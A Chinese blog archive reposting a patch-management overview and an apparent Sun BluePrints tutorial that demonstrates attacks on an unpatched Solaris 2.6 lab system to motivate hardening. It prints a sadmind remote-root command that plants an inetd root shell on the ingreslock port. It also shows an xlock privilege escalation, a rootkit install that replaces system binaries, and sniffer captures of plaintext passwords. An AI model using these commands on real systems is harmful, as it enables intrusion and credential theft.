Archive for category 网络和安全

按：本文转自www.tomshardware.com

简介

现今似乎到处都有人都在发展跳舞艺术（语带双关：写臭虫程序）。不是的，我们不是以在80年代发明的高难度霹雳舞来做比喻， 而是说一小段撰写的程序代码，目的为用来尽可能感染易受影响的计算机。当许多IT专家刚清除完Zotob臭虫程序时，我们觉得这是绝佳时机来反映出每个系 统与网管人员长久以来的心声，那就是：漏洞修补管理。

对许多IT团队来说，漏洞修补管理仍是相当新颖的概念。直到前年，当MS Blaster臭虫程序对无防备的系统带来浩劫，因此很多团队才开始考虑修补策略。Blaster利用Windows系统的远程过程调用（remote procedure call；RPC）弱点，让臭虫程序如野火般迅速扩散…在全球感染超过了800万部PC。这重创了许多公司数个星期，那时候修正套件与修正程序都很迅速地 测试与套用，不过一般来说还是用手动下载来安装。

每个人都听过「时间是至关重要的」这句话，这也一定能适用于漏洞修补管理的领域。微软的安全性警告发表与臭虫程序的开始散布的时间差，说明了威胁正步步进逼。以下说明了这个倾向：

• MS Blaster Worm (2003)：在微软的安全性警告发表后约1个月出现。

• Sasser Worm (2004)：在微软的安全性警告发表后约2个星期出现。

• Zotob Worm (2005)：在微软的安全性警告发表后约1个星期出现。

对大部分公司来说旧式的病毒不会是前三大威胁。

这些缩短的时间表让IT专家感受到很大的压力，而必须确定所掌握的工具与处理程序能快速修补工作站与服务器的漏洞。这篇报导 的目的是要来了解：1. 尝试于企业级环境中套用安全性修正程序与软件更新时所可能发生的常见问题。2. 这些修正与更新程序如何利用技术或手动安装程序来达到漏洞修补管理的目的。在之后接下来的报导中，我们将分析数种市场上的漏洞修补管理解决方案，这些都是 你的公司会感兴趣使用的。

待解决的常见问题

在企业级环境中，有数个问题对应用程序的安全性修正程序来说是必须要解决的。这些问题一般能透过自动更新工具或手动安装程序来达成。让我们来浏览一些常见问题。

修正远程客户端

当你的公司必须处理很多透过拨接或VPN服务来存取网络的远程客户端时，如何修正这些远程客户端便是一个问题。这要视微软（或其它厂商）在每个月发布多少修正程序而定，你可能必须套用数个好几MB的修正程序在连接于低速网络的计算机。

就衡量面的技术问题来说，数种漏洞修补管理工具能控制幕后智能型传送服务（BITS）不必立即占用所有可用频宽，就能够「分散提供」修正程序给远程客户端。

假如上述方式无法达成，这里你还有数个手动安装程序可用。某些公司每个月还在制作CD，并透过速度上慢很多的传统邮寄方式发送给远程客户端。每个月的安全性修正程序会「很专业地」全部集中，让没有本端管理者权限的使用者能安装这些安全性修正程序。

修正已关机的工作站

如果硬件支持，请启用网络唤醒（WOL）并用于漏洞修补管理。

假如有人休假而且已将工作站关机，这样IT如何使用自动更新工具来修正工作站？许多人可能会告诉你这没关系。当使用者返回工 住岗位并开启服务器电源，登入之后，只要使用了漏洞修补管理工具，系统会从中收到修正程序。但这同时也不一定正确无误，因为通常修正程序安装速度不够快。 假如在网络中你有活动中的臭虫程序感染风险，当计算机网络卡开始作用时，系统很有可能被感染。

最好的方法是使用网络唤醒来实时修正工作站。数种漏洞修补管理应用程序让你能远程开启工作站电源，来特别安装安全性修正程序。这是所有可能性中更好的方式。

常替换或重新用影像文件安装的工作站

每当部署新计算机或需要重新组装现有计算机时，安装全新的操作系统是很没效率的。基于这个理由，大多数的大型IT团队使用类 似使用Norton的GHOST应用程序，建立标准桌上型计算机与服务器影像文件。很重要的是这些影像文件至少基于每一季更新一次，来包含自从上次建立影 像文件后，尚未涵盖之软件厂商新发布的安全性修正程序。

何故？当工作站重新用影像文件安装或替换，多数的自动漏洞修补管理解决方案会安装任何未安装的套件（安全性或其它的），而这 套件是被视为强制底线的一部份。如果你有一年期的主动安全性修正程序安装，在新增新计算机时，安全性修正程序会立即（或在短时间内）执行所有的安装，并执 行多次重开机。在最坏的情况下，这会打乱或困扰使用者，而因此会寻求不必要的客户支持服务。至少这会减缓IT成员设定新计算机的处理程序。当新的安全性修 正程序增加到影像文件中时，这些安全性修正程序部署在你的漏洞修补管理应用程序可以被取消作用，或从强制底线移除。

代理程序vs.无代理程序

提到究竟什么漏洞修补管理解决方案最适合你的公司时，「代理程序vs.无代理程序」将会是你必须回答的问题之一。使用代理程 序的解决方案需要部分软件安装于每一个受管理的工作站与服务器。这软件会定期返回与中央服务器沟通，提供关于有问题计算机的信息，并寻找新的作业，例如： 待部署的修正程序。无代理程序的解决方案不需要这客户端软件；这些解决方案会藉由使用标准的Windows通讯协议来扫瞄网络，找到工作站与服务器。

每个解决方案都有利弊。一般对无代理程序解决方案的争论是：不需要别的应用程序在背景执行来使用许多资源（内存与处理器时 间）。当硬件价格随时间降低与内存随计算机贩卖，这将不会是问题。基于代理程序解决方案的另一个问题是：将代理程序软件安装在世界各地的数以千计的服务器 上比你想象的更困难。尤其当你有大部分的客户端是使用拨接或VPN服务来连接到网络时，更是如此困难。假如这样，IT客户支持成员可能需要采取偷偷安装代 理程序软件的方式。

无代理程序的解决方案本身也有问题。前提是这些解决方案常使用标准Windows通讯协议，例如：NetBIOS，来扫瞄网 络，这就会有机会无法找到每一台需要受管理的工作站与服务器。当某些公司不想被使用高权限层次账号登入扫瞄主控台时，为了怕有风险，也许就有需要凭证的问 题。当无代理程序的解决方案一般会比基于代理程序的产品使用较多的频宽时，对频宽与价格有相关的取决较苛求的公司，可能避免选择无代理程序的解决方案。

当做这样的决定时，记得要将你的环境特性考虑进去。假如你有广布的基础架构，有大部分的远程客户端需要被修正，那么基于代理程序的解决方案应该会较适合。假如你的公司只特定在一个实体位置与局域网络（LAN），那么无代理程序的解决方案应该是最适合。

结论

臭虫程序感染若要完全消除，会花费一家公司数百万美元（数千万到数亿新台币）。就其本身而论，在适当的地方拥有有效的漏洞修 补管理策略是不可或少的。臭虫程序与病毒活动在过去数年增加是已知的，所以很明确的是安全性修正程序必须以实时的方式被测试与套用。不管你的网络安全防护 多牢靠，恶意程序代码仍然能找到网络漏洞。

下一次的漏洞修补管理系列安装不久又要发布了。它会涵盖特定可用于提供漏洞分析与部署安全性修正程序的解决方案。

按：本文摘自SUN技术社区，主要针对于Solaris用户。

本文中，我们假定大家采用Solaris的缺省配置，我们以此为例，说明什么样的系统漏洞最容易招致黑客攻击。同时，我们采用的工具都是网上很容易找到的免费软件，以此演示黑客进攻所使用的技巧。

这里演示的攻击方法都有相应的预防措施，但是，黑客们每天都在使用这些方法取得成功。只有你知道黑客在做什么，他们是怎么做的，你才会明白在自己的机构中建立和维护一个安全的系统是多么重要。

许多管理员仅仅在安装系统的时候才会考虑安全性问题，以为这样就一劳永逸了。可惜事实上保护系统的安全是一个不断进行的过程，必须经常跟踪和检查。

使用本文提供的资料，你可以尝试攻击你所管理的数据中心(datacenter)，高端服务器或者其他系统来检查是不是最基本的攻击方式都可以轻易得手。根据这些信息，你就可以确定系统的缺陷，然后采取措施加以保护。

这篇文章包括以下内容：

攻击的策略
工具
操作步骤
如何使用工具
相关参考资料

攻击的策略

苍蝇不叮没缝的蛋，黑客攻击总是寻找有漏洞的系统。一般来说，漏洞有三种：
1．账户系统的漏洞
2．操作系统的漏洞
3．运行环境（一般是后台进程）的漏洞

大 多数黑客都是由于好奇心的驱使而发起攻击的，所以这些黑客最终也许会找到某种专门的方法来进行有效的攻击。但绝大多数成功入侵都是利用早已公布的安全漏洞 来完成的。管理员或者是没有打必要的补丁，或者是没有禁用这些功能，终于飞来横祸。今天，我们要讨论的就是这种不应该发生但事实上却每天都在发生的故事。

提示：你可以利用SUN公司推荐的工具包 Solaris Security Toolkit 来帮助你完善系统：打上该打的补丁或者禁用某些危险的功能。这个工具包可以从 http：//www.sun.com/blueprints/tools 下载。

发现账户系统的漏洞

黑 客社会经常出现这样一种情况：某些黑客高手开发出一个很好的扫描工具以后，就把这个工具放到网上，由于这个工具能够有效地搜索已经公布的系统漏洞，很多低 级黑客（通常是所谓的”脚本少年”）就开始利用这个工具7X24小时地工作，搜索大量的主机系统来找出一些存在漏洞的系统。如果他们想进入某个公司的系 统，就会寻找所有与其有关的主机进行扫描。

扫描过后，一般总能发现一些差劲的系统，这些少年就可以开始工作了。由 于漏洞的严重程度不同，有时候他们只能建立非特权账户，但有时候就可以建立一些特权账户。不管怎样，攻击者已经有了落脚点，他们进一步的扩大战果，获取更 多的特权，还会继续攻击所有跟这台主机有信任关系的其他主机。

发现操作系统的漏洞

如前所述，黑客首先寻找系统漏洞以获取一个账户，然后再寻找操作系统的漏洞来进攻。

寻找某个特定操作系统的漏洞非常容易。现今有许多机构在Internet上提供操作系统的漏洞大全。这些机构的目的是想给公众提供资料，所以一般的网民和黑客同样可以获取这些资源。换句话说，你和黑客是平等的，每个人都有能力成为黑客。

Mitre, 一个为政府服务的智囊团，维护着一个有关系统漏洞和安全隐患的字典，(Common Vulnerability and Exposures—简称 CVE)。他们在自己的网站上解释这样做的目的：

我们给每个系统漏洞和信息安全隐患起一个标准化的名字—CVE 的目标就是标准化所有已知系统漏洞和安全隐患的命名以方便查阅和搜索。

其它的安全网站，比如 SecurityFocus, CERT, SANS Institute等等, 都提供方法和工具来发现并攻击系统漏洞

攻击运行环境

以Solaris 2.6为例。一个非常有名的漏洞就是由 sadmind 进程造成的。（现在已经有专门的补丁）。黑河经常利用这个漏洞获取root 权限。
每个人都可以很容易学会怎样利用这个漏洞进行攻击：搜索前面的Mitre网站可以得到一个CVE 编号，再利用一个搜索引擎和这个编号，你就可以找到用来攻击的源代码和详尽的攻击步骤。整个寻找过程只要几分钟。比如，到SecurityFocus站点 找源代码，到SANS站点找攻击方略。

工具

黑客们有许多工具攻击系统，我们这里所介绍的每种工具都有专门的用途。我们把这些工具分为四个类型：

端口扫描工具
漏洞扫描工具
Rootkits （隐身工具）
Sniffers （抓包工具）

端口扫描工具

端口扫描工具大概是Internet上用得最多的扫描工具了。这个工具扫描大量的IP地址，然后得出一系列的报告： 他们遇到的主机，操作系统的类型，可用的端口，等等。现在最流行的工具是Network Mapper(Nmap).

Nmap的网站这样描述这个工具：

Nmap (“Network Mapper”) is an open source utility for network exploration or
security auditing. It was designed to rapidly scan large networks, although it
works fine against single hosts. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (ports) they are
offering, what operating system (and OS version) they are running, what type of
packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs
on most types of computers, and both console and graphical versions are
available. Nmap is free software, available with full source code under the terms
of the GNU GPL.3

Nmap 是一个用于检察系统安全性的开放源码工具。它主要用来扫描大量的网络主机，当然，检查单个主机更没问题。由于Nmap使用原始IP包搜集数据，然后以一种 很巧妙的方式判断如下信息：网络上有哪些主机，都提供那些服务，操作系统是什么，是哪亿个版本，使用了哪一类包过滤/防火墙技术，等等。Nmap支持大多 数操作系统，包含命令行版本和GUI版本。Nmap 是自由软件，任何人可以在GNU GPL下获得其源代码。

Nmap 支持的扫描种类非常多：包括TCP SYN和 NULL scan。其他选项包括OS fingerprinting, parallel scan, 以及decoy scanning 等。Nmap有一个命令叫做xnmap可以支持图形方式的操作。更详细的信息可以从Nmap网站或者nmap(1M)的手册页得到。

系统漏洞扫描

漏洞扫描工具可以对目标系统进行测试，看它是不是存在某个特定的漏洞可以用来攻击，或者是许多已知漏洞中的一个。大多数这种工具都可以免费得到，这里着重介绍目前最流行，也是发展最快的一个工具： Nessus.

Nessus的网站这样描述这个工具：
“Nessus”项目致力于向Internet社区提供一种免费但功能强大，迅速更新的远程安全检查工具。这种工具可以通过在远端操作就可以评估一个网络的安全性，看它是不是能够被轻易攻入，当然，也难免有人会怀着其他目的使用这个软件。
与其他的安全检查工具不同，Nessus从不做事先假定，举个例子，它不会假定web server是监听在80端口，所以即使你在1234端口启动apache，它也可以发现，Nessus也不根据软件的版本判断是否存在漏洞，它只是真正 的测试这个软件看它是不是有问题。
Nessus速度非常快，也很可靠，它是基于模块架构的，这样你如果需要的话可以很容易的改造它。

Nessus为系统管理员和黑客提供了同样的工具来检查一个系统，评价它是否安全。它既支持命令行方式，也支持图形界面，但一般用图形界面更方便。如果需要更多的信息，请访问Nessus网站。

Rootkits（隐身工具）

Rootkits是指由一些脚本和程序打包成的一种工具，这种工具能帮助入侵者消除自己曾经侵入这个系统，并曾经获取root权限的痕迹，它的主要工作如下所示：
修改log文件，清除黑客活动证据。
修改系统工具，使得管理员很难甚至无法发现黑客活动。
为下次入侵留下后门。
把当前的系统变成落脚点，进一步入侵其它系统。

Sniffers（抓包工具）

一般的网络软件仅仅接受专门发给自己的IP包，Sniffing使计算机能够截获局域网上所有的包，来获取一些不必要知道或者不应该知道的东西。要想使用 sniffer，必须先把计算机设置到一种特定的模式，使得底层的网络软件把所有收到的IP包都转发到上层的应用程序。

Solaris自带一个snoop工具，尽管相对粗糙，但仍然能够清除的以文本方式显示收到的用户ID和口令。目前经常使用的许多网络软件都使用铭文传送用户名和口令的。比如Telnet,IMAP,POP3等。

黑客一旦进入系统，通常会安装一个抓包工具来寻找更多的用户名和口令，也会寻找网络结构方面的信息，以方便进一步的攻击。

操作步骤

本届以两个实例说明黑客入侵一个没有安全保护的系统有多么轻而易举，我们的两个实例模拟以下两种情况的攻击：

从Internet 发起攻击
从网络内部发起攻击

在以上两种攻击情形中，黑客只要得到了root权限，就会想办法保留这种进攻途径，以便下一次进入系统，它也会建立更多的特权，以获取更多的资源。我们在这里把黑客用到的工具综合起来，来显示他们是怎样工作的。

从Internet发起攻击

这个实例中，我们用Nessus找到一个Solaris2.6系统，这个系统存在sadmind 的RPC漏洞而且没有打补丁，我们看看sadmind 进攻是如何攻破系统的。

首先，黑客用一个rootkit来获取并保护自己的root访问权限。在 sadmindex.c 程序的开头有这样一段关于用法的信息：

sadmindex – SPARC Solaris remote root exploit for /usr/sbin/
sadmind Tested and confirmed under Solaris 2.6 and 7.0 (SPARC)
Usage: % sadmindex -h hostname -c command -s sp [-o offset] [-a
alignment] [-p]
where hostname is the hostname of the machine running the
vulnerable system administration daemon, command is the command to
run as root on the vulnerable machine, sp is the %sp stack pointer
value, offset is the number of bytes to add to sp to calculate the
desired return address, and alignment is the number of bytes needed
to correctly align the contents of the exploit buffer.

Sadmindex的作者甚至给出了一个推荐的sp 堆栈指针值来使得攻击更加容易。
有时可能需要调整sp 参数，作者也给出了调整的方法，事实上也花不了许多时间。
我们从一个运行Solaris8的系统向目标机器发起攻击：

# ./sadminsparc -h nfs -c "echo ’ingreslock stream tcp nowait root
/bin/sh sh -i’
>/tmp/.gotcha; /usr/sbin/inetd -s /tmp/.gotcha" -s 0xefff9596

运行的过程如下：

% sp 0xefff9596 offset 688 –> return address 0xefff9844 [4]
% sp 0xefff9596 with frame length 4808 –> %fp 0xefffa858
clnt_call: RPC: Timed out
now check if exploit worked; RPC failure was expected

作为系统管理员，如果你想在自己的系统上试一下，或者你想检查是否有黑客攻击了你的系统，可以使用以下命令：

# ps -ef | grep inetd
root 5806 1 1 22:59:38 ? 0:00 /usr/sbin/inetd -s /tmp/.x

然后，执行以下命令来检查ingreslock进程是否生效：

# netstat -a | grep ingres
*.ingreslock *.* 0 0 0 0 LISTEN

黑客可以用以下命令建立Telnet连接，从而获得root权限：
# telnet nfs ingreslock
Trying 192.168.0.20…
Connected to nfs.
Escape character is ’^]’.
# hostname
nfs

从内部攻击

这是一个很常见的情形，某个公司职员可以访问系统，但没有root特权，如果系统不足够安全的话，就会给居心不良的职员以可乘之机。
雇员恶意攻击系统以获取更多权限的问题是确实存在的，但很多系统管理员或经理人员总是忽视这个问题，他们或者认为这样的事情不会发生，或者觉得应该充分相信雇员。这样就很容易引发严重的安全问题。

许多系统都会有各种各样的用户，他们的权限根据用户ID和所在的用户组确定，一般来说，这些用户没有root口令，也没有root权限。但当一个授权用户心存恶意的时候，当某个入侵者采用某种手段得到了一个有效的账户的时候，将会发生什么事情呢？

进入系统以后，入侵者大多会利用某些软件的缓冲区溢出问题进行攻击来得到root权限。例如，2001年8月10号，就有人发现xlock存在缓冲区溢出问题。(xlock是X-windows用来锁屏的程序)这个漏洞很有价值，因为xlock是用 setuid root命令安装的。

在网上可以很容易地找到利用这个漏洞进行攻击的源代码，只需要131行，在我们的例子中，我们用gcc编译了这个程序，然后放在测试系统ganassi上面。下面是攻击的过程：

console login: noorder
Password:
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
ganassi% /usr/ucb/whoami
noorder
ganassi% ./sol_sparc_xlockex
shellcode address padding = 0
stack arguments len = 0×502(1282)
the padding zeros number = 2
Using RET address = 0xeffffb10
Using retloc = 0xefffe8c4
# /usr/ucb/whoami
root

现在我们已经得到root权限了，下面的攻击就很容易了，可以安装sniffer，也可以设置后门，运行rootkits，等等。

如何使用工具：

这一节介绍前面提到的几个工具的用法，我们给出使用的例子和解释输出结果的技巧，把这些信息和前面的攻击案例结合起来，可以使进攻更犀利，更有效。

端口扫描工具用法：
我们用下面的例子解释Nmap的用法。从输出结果可以看到系统当前所运行的服务，Nmap辨别目标操作系统版本的能力非常有用，因为这样可以为其后的攻击节省很多时间。

根据Nmap的输出结果，这个系统是一个Solaris2.6或者Solaris7系统，大多数缺省的服务都在运行。
输出结果如下：

# /usr/local/nmap -O ganassi
Starting nmap V. 2.53 (www.insecure.org/nmap/)
Interesting ports on ganassi (10.8.10.231):
(The 1515 ports scanned but not shown below are in state: closed)
Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
19/tcp open chargen
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
37/tcp open time
79/tcp open finger
111/tcp open sunrpc
512/tcp open exec
513/tcp open login
514/tcp open shell
515/tcp open printer
540/tcp open uucp
1103/tcp open xaudio
4045/tcp open lockd
6112/tcp open dtspc
7100/tcp open font-service
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
32775/tcp open sometimes-rpc13
32776/tcp open sometimes-rpc15
32777/tcp open sometimes-rpc17
32778/tcp open sometimes-rpc19
Remote operating system guess: Solaris 2.6 – 2.7
Uptime 0.054 days (since Wed Sep 12 09:41:59 2001)
Nmap run completed — 1 IP address (1 host up) scanned in 37 seconds

漏洞扫描工具
Nessus用法如下：
# nessus -T text localhost 1241 noorder targetfile outfile
nessus检察 targetfile中的主机，并将检查结果保存在 outfile
输出文件如下所示：
Nessus Scan Report
——————
SUMMARY
– Number of hosts which were alive during the test : 1
– Number of security holes found : 2
– Number of security warnings found : 15
– Number of security notes found : 1
TESTED HOSTS
192.168.0.90 (Security holes found)

然后是检查的细节描述：
DETAILS
+ 192.168.0.90 :
. List of open ports :
o unknown (161/udp) (Security hole found)
o unknown (32779/udp) (Security warnings found)
o unknown (32775/tcp) (Security warnings found)
o unknown (32776/udp) (Security warnings found)
o unknown (32778/udp) (Security warnings found)
o unknown (32774/udp) (Security hole found)
o unknown (32777/udp) (Security warnings found)
o unknown (32780/udp) (Security warnings found)
o unknown (32775/udp) (Security warnings found)
o lockd (4045/udp) (Security warnings found)
o unknown (32781/udp) (Security hole found)
. Vulnerability found on port unknown (32774/udp) :
The sadmin RPC service is running.
There is a bug in Solaris versions of
this service that allow an intruder to
execute arbitrary commands on your system.
Solution : disable this service
Risk factor : High

利用这些输出信息，黑客可以按照我们上文描述的方法入侵系统。
另外，nessus还可以发现一种叫做“拒绝服务”式的漏洞：

DETAILS
. List of open ports :
o general/tcp (Security hole found)
. Vulnerability found on port general/tcp :
It was possible
to make the remote server crash
using the ’teardrop’ attack.
A cracker may use this attack to
shut down this server, thus
preventing your network from
working properly.
Solution : contact your operating
system vendor for a patch.
Risk factor : High
CVE : CAN-1999-0015

使用Rootkits
网络上有不少这种软件，我们使用针对Solaris2.6的一个工具包(sun2.rootkit)来演示。这个rootkit包含三个类型的程序：

网络抓包工具
log文件修改
Internet Relay Chat(IRC)proxy

这个工具包中有一个安装脚本：
ganassi# ./setup.sh
hax0r w1th gforce
Ok This thing is complete
cp: cannot access l0gin
cp: cannot create /usr/local/bin/find: No such file or directory
mv: cannot access /etc/.ts
mv: cannot access /etc/.tp
– WTMP:
/var/adm/wtmp is Thu Mar 26 13:21:36 1987
/usr/adm/wtmp cannot open
/etc/wtmp is Thu Mar 26 13:21:36 1987
/var/log/wtmp cannot open
WTMP = /var/adm/wtmp
No user re found in /var/adm/wtmp
[...]
./setup.sh: ./zap: not found
./secure.sh: rpc.ttdb=: not found
#: securing.
#: 1) changing modes on local files.
#: will add more local security later.
#: 2) remote crap like rpc.status , nlockmgr etc..
./secure.sh: usage: kill [ [ -sig ] id … | -l ]
./secure.sh: usage: kill [ [ -sig ] id … | -l ]
#: 3) killed statd , rpcbind , nlockmgr
#: 4) removing them so they ever start again!
5) secured.
193 ? 0:00 inetd
cp: cannot access /dev/.. /sun/bot2
kill these processes@!#!@#!
cp: cannot access lpq
./setup.sh: /dev/ttyt/idrun: cannot execute
Irc Proxy v2.6.4 GNU project (C) 1998-99
Coded by James Seter :bugs-> (Pharos@refract.com) or IRC pharos on
efnet
–Using conf file ./sys222.conf
–Configuration:
Daemon port……:9879
Maxusers………:0
Default conn port:6667
Pid File………:./pid.sys222
Vhost Default….:-SYSTEM DEFAULT-
Process Id…….:759
Exit ./sys222{7} :Successfully went into the background.

这个脚本写的既不高明也不标准，但它确实生效了，最终替换了下列系统程序：
/bin/ls
/usr/bin/ls
/bin/ps
/bin/netstat
/usr/bin/netstat
/usr/sbin/rpcbind

现在攻击者取得了root权限而且这个系统已经变得：
系统管理员很难使用标准的Solaris命令发现入侵者的踪迹，因为这些命令已经被换成了特罗伊木马。
入侵者很容易再次入侵系统，因为login和rpcbind两个程序的新版本将允许进攻者远程登录系统。

Rootkit还在俘虏主机上安装了抓包工具，包括：le,sniff,sniff-10mb,和sniff-100mb.
在我们的系统上只有sniff-100mb可以工作，因为其他几个工具固定死了网卡接口的名称。
Sniff-100mb缺省使用hme0网卡，当网络有活动的时候，程序清晰的打印出结果：
ganassi# ./sniff-100mb
Using logical device /dev/hme [/dev/hme]
Output to stdout.
Log started at => Thu Aug 26 15:31:10 [pid 856]
— TCP/IP LOG — TM: Thu Aug 26 15:31:19 –
PATH: 10.8.10.200(34398) => ganassi(telnet)
STAT: Thu Aug 26 15:31:48, 111 pkts, 128 bytes [DATA LIMIT]
DATA: (255)(253)^C(255)(251)^X(255)(251)^_(255)(251)
(255)(251)!(255)(251)"(255)(251)’(255)(253)^E(255)(250)^_
: P
: ^X(255)(240)(255)(252)#(255)(252)$(255)(250)^X
: DTTERM(255)(240)(255)(250)’
: (255)(240)(255)(253)^A(255)(252)^Anoorder
: t00lk1t
: ls
: who
: cd /var/tmp
: ls -al
–

输出中清楚地包含用户名和口令。
这个rootkit中处理log文件的程序叫做zap,它在却省的路径中寻找并修改下面几个文件：utmp,utmpx,wtmp,wtmpx和lastlog.
还有一个工具叫做bot,它可以维护一个专门的IRC通道，用来发送消息或者相应一些命令。

使用Sniffers
为了说明用抓包工具获取用户名和口令的用法，我们用snoop来做实验，搜集这些信息只需要几秒钟就可以了：
先是一个Telnet的例子:
# snoop -d qfe0 port telnet ganassi
ganassi -> nomex-lab TELNET R port=32835
37737313773751login:
nomex-lab -> ganassi TELNET C port=32835 r
ganassi -> nomex-lab TELNET R port=32835 r
nomex-lab -> ganassi TELNET C port=32835 o
ganassi -> nomex-lab TELNET R port=32835 o
nomex-lab -> ganassi TELNET C port=32835
nomex-lab -> ganassi TELNET C port=32835 o
ganassi -> nomex-lab TELNET R port=32835 o
nomex-lab -> ganassi TELNET C port=32835
nomex-lab -> ganassi TELNET C port=32835 t
ganassi -> nomex-lab TELNET R port=32835 t
nomex-lab -> ganassi TELNET C port=32835
ganassi -> nomex-lab TELNET R port=32835 Password:
nomex-lab -> ganassi TELNET C port=32835
nomex-lab -> ganassi TELNET C port=32835 t
ganassi -> nomex-lab TELNET R port=32835
nomex-lab -> ganassi TELNET C port=32835 0
ganassi -> nomex-lab TELNET R port=32835
nomex-lab -> ganassi TELNET C port=32835 0
ganassi -> nomex-lab TELNET R port=32835
nomex-lab -> ganassi TELNET C port=32835 l
ganassi -> nomex-lab TELNET R port=32835
nomex-lab -> ganassi TELNET C port=32835 k
ganassi -> nomex-lab TELNET R port=32835
nomex-lab -> ganassi TELNET C port=32835 1
ganassi -> nomex-lab TELNET R port=32835
nomex-lab -> ganassi TELNET C port=32835 t
nomex-lab -> ganassi TELNET C port=32835
ganassi -> nomex-lab TELNET R port=32835 Last login: Thu Mar
nomex-lab -> ganassi TELNET C port=32835
ganassi -> nomex-lab TELNET R port=32835 #

然后是一个IMAP的例子：
# snoop -d qfe0 port imap2 ganassi
jordan -> ganassi IMAP C port=46600
ganassi -> jordan IMAP R port=46600
jordan -> ganassi IMAP C port=46600
ganassi -> jordan IMAP R port=46600 * OK ganassi SIMS ™ 2.0p12
IMAP
jordan -> ganassi IMAP C port=46600
jordan -> ganassi IMAP C port=46600 1 capability

ganassi -> jordan IMAP R port=46600
ganassi -> jordan IMAP R port=46600 * CAPABILITY IMAP4 STATUS SCAN
IMAP4
jordan -> ganassi IMAP C port=46600
jordan -> ganassi IMAP C port=46600 2 login "hacked" "t00lk1t”

ganassi -> jordan IMAP R port=46600 2 OK LOGIN completed

使 用snoop是最直接的办法，但如果它运行的时间很长，就会产生大量的数据，很容易引起怀疑，所以更好的办法是采用某种可以仅仅保存用户名和口令的工具， sniffit使其中非常简单的一个,令一个复杂一些，但也更灵活，更强大的工具是dsniff.（它还可以攻击交换式网络）这两个工具都可以长时间的运 行来收集成百上千的用户名和口令。

交换式网络
说到网络抓包，有必要提一下网络交换机，与集线器hub一样，网络交换机把多个系统连接到一个网段中。主要的区别式交换机是基于端口工作的，这种方式下， 交换机的每个端口只能看到发给它的IP包，而不是网上所有的报都可以看到。这样就算一块网卡配成混合模式，它也不能受到发送到其他地方的包。

因此，许多人认为抓包工具没有用。但事实上即便是交换式网络中也需要小心抓包工具，原因有两点：1，一台机器上的抓包工具既可以收集发到本系统的包，也可 以收集从本机发出的包，这样就有更多的口令容易泄漏；2，ARP攻击可以对付网络交换机，是它把所有的包都通过一个固定的端口进行转发，这样sniff仍 然有用武之地。所以，网络交换机是预防sniff攻击的一种方法，但绝不是彻底的方法。

要想真正防止抓包工具，必须采用加密技术。例如，用SSH代替Telnet和FTP，用SSL代替普通的pop3收发邮件。这样才能真正有效地避免sniffing.

Terminal Server(终端控制器)
许多机构经常利用终端控制器管理一些服务器主机(这些主机没有显示器，键盘和鼠标，只能通过远程终端控制台管理)。尽管在数据中心这样做可以节省空间和资源，非常必要，但也应该注意安全性的问题，比如，SUN cluster3.0附带的终端控制器通常是8口的Bay Annex Server。这种终端控制器同样是利用Telnet工作的。以下是snoop纪录的一次root登录中断服务器的过程：

# snoop -d qfe0 nts01
nts01 -> nomex TELNET R port=34395
Rotaries Defined:
nomex -> nts01 TELNET C port=34395
nts01 -> nomex TELNET R port=34395

Enter Annex p
nomex -> nts01 TELNET C port=34395
nomex -> nts01 TELNET C port=34395 3
nts01 -> nomex TELNET R port=34395
nts01 -> nomex TELNET R port=34395 Attached to port 3
nomex -> nts01 TELNET C port=34395
nts01 -> nomex TELNET R port=34395 ganassi console lo
nomex -> nts01 TELNET C port=34395
nomex -> nts01 TELNET C port=34395 r
nts01 -> nomex TELNET R port=34395 r
nomex -> nts01 TELNET C port=34395 o
nts01 -> nomex TELNET R port=34395 o
nts01 -> nomex TELNET R port=34395 o
nomex -> nts01 TELNET C port=34395 o
nomex -> nts01 TELNET C port=34395 t
nts01 -> nomex TELNET R port=34395 t
nomex -> nts01 TELNET C port=34395
nts01 -> nomex TELNET R port=34395 Password:
nomex -> nts01 TELNET C port=34395
nomex -> nts01 TELNET C port=34395 t
nts01 -> nomex TELNET R port=34395
nomex -> nts01 TELNET C port=34395 0
nts01 -> nomex TELNET R port=34395
nomex -> nts01 TELNET C port=34395 0
nts01 -> nomex TELNET R port=34395
nomex -> nts01 TELNET C port=34395 l
nts01 -> nomex TELNET R port=34395
nomex -> nts01 TELNET C port=34395 k
nts01 -> nomex TELNET R port=34395
nomex -> nts01 TELNET C port=34395 1
nts01 -> nomex TELNET R port=34395
nomex -> nts01 TELNET C port=34395 t
nts01 -> nomex TELNET R port=34395
nomex -> nts01 TELNET C port=34395
nts01 -> nomex TELNET R port=34395 Mar 26 13:04:36 ga
nts01 -> nomex TELNET R port=34395 Last login:
nomex -> nts01 TELNET C port=34395
nts01 -> nomex TELNET R port=34395 Thu Mar 26 13:03:06
nts01 -> nomex TELNET R port=34395 SunOS 5.6 Gene

显然，终端服务器同样需要安全保护，可以采用两种方法：一是采用支持SSH的终端服务器，二是把终端服务器与本地子网隔离开来，通过一个支持SSH的网关登录终端服务器。

参考资料：

1. Webster’s Third New International Dictionary, Merriam-Webster, Inc., Springfield,
MA, 1986, page 2442.
2. Common Vulnerability and Exposures (CVE) Web site:
http://cve.mitre.org
3. NMap web site: http://www.nmap.org
4. Nessus web site: http://www.nessus.org

相关资源：
公共出版物：
Dasan, Vasanthan, Noordergraaf, Alex, and Ordica, Lou. The Solaris Fingerprint
Database—A Security Tool for Solaris Software and Files, Sun BluePrints OnLine, May
2001
Deeths, David and Brunette, Glenn. Using NTP to Control and Synchronize System
Clocks – Part II: Basic NTP Administration and Architecture, Sun BluePrints OnLine,
August 2001.
Noordergraaf, Alex. Building Secure N-Tier Environments, Sun BluePrints OnLine,
October 2000.
Noordergraaf, Alex. Solaris Operating Environment Minimization for Security:
Updated for the Solaris 8 Operating Environment, Sun BluePrints OnLine, November
2000.
Noordergraaf, Alex and Brunette, Glenn. The Solaris Security Toolkit—Quick Start:
Updated for Version 0.3, Sun BluePrints OnLine, June 2001.
Noordergraaf, Alex and Watson, Keith. Solaris Operating Environment Security:
Updated for the Solaris 8 Operating Environment, Sun BluePrints OnLine, April 2001.
Prosise, Chris and Shah, Saumil Udayan. At the Root of Rootkits, CNET Online,
